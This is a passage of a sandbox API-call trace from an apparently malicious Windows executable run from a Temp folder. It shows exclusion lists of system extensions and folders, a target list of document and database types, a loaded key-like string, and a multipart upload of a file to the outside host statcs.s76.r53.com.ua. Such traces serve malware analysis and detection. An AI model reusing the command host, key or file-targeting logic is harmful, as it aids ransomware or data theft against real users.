dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] 
CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL 
SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0116.485] GetCurrentThreadId () returned 0xdf8 [0116.485] GetCurrentThreadId () returned 0xdf8 
[0116.485] GetCurrentThreadId () returned 0xdf8 [0116.485] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0116.485] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0116.485] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0116.485] LockResource (hResData=0x516f58) returned 0x516f58 [0116.485] FreeResource (hResData=0x516f58) returned 0 [0116.485] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0116.485] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0116.485] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0116.485] LockResource (hResData=0x50d64c) returned 0x50d64c [0116.485] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0116.485] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0116.485] FreeResource (hResData=0x50d64c) returned 0 [0116.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0116.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14150b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0116.485] GetCurrentThreadId () returned 0xdf8 [0116.485] GetCurrentThreadId () returned 0xdf8 [0116.485] GetCurrentThreadId () returned 0xdf8 [0116.485] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a4258, 
cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0116.485] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a4258, cbMultiByte=97, lpWideCharStr=0x1372ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0116.486] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0116.486] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0116.486] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0116.486] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0116.486] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0116.486] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0116.486] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0116.486] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0116.486] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0116.486] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0116.486] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW 
() returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" 
[0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="FILESEXTLIST", cchCount1=12, lpString2="FILESEXTLIST", cchCount2=12) returned 2 [0116.486] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\7l6owdi9fmrsoy1o.elst")) returned 0x2020 [0116.486] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\7l6owdi9fmrsoy1o.elst"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0116.487] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="--2FA581AC_Synapse_boundary\r\ncontent-disposition: form-data; name=\"uploadfile\"; filename=\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\"\r\nContent-Type: Application/octet-string\r\n\r\n", cchWideChar=202, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | 
out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 202 [0116.487] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="--2FA581AC_Synapse_boundary\r\ncontent-disposition: form-data; name=\"uploadfile\"; filename=\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\"\r\nContent-Type: Application/octet-string\r\n\r\n", cchWideChar=202, lpMultiByteStr=0x1372ebc, cbMultiByte=202, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="--2FA581AC_Synapse_boundary\r\ncontent-disposition: form-data; name=\"uploadfile\"; filename=\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\"\r\nContent-Type: Application/octet-string\r\n\r\n", lpUsedDefaultChar=0x0) returned 202 [0116.487] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x12fb68*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12fb68*=0) returned 0x0 [0116.487] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x12fb64*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12fb64*=0) returned 0x0 [0116.487] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x12fb64*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12fb64*=0) returned 0x1e1 [0116.487] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x12fb64*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12fb64*=0) returned 0x0 [0116.487] ReadFile (in: hFile=0xb8, lpBuffer=0x133d088, nNumberOfBytesToRead=0x1e1, lpNumberOfBytesRead=0x12fb44, lpOverlapped=0x0 | out: lpBuffer=0x133d088*, lpNumberOfBytesRead=0x12fb44*=0x1e1, lpOverlapped=0x0) returned 1 [0116.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\r\n--2FA581AC_Synapse_boundary--\r\n", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0116.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 
lpWideCharStr="\r\n--2FA581AC_Synapse_boundary--\r\n", cchWideChar=33, lpMultiByteStr=0x14150b4, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n--2FA581AC_Synapse_boundary--\r\n", lpUsedDefaultChar=0x0) returned 33 [0116.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f8514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0116.488] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x143204c, cbMultiByte=27, lpWideCharStr=0x12ea34, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0116.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0116.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x13ea6fc, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0116.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f853c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", 
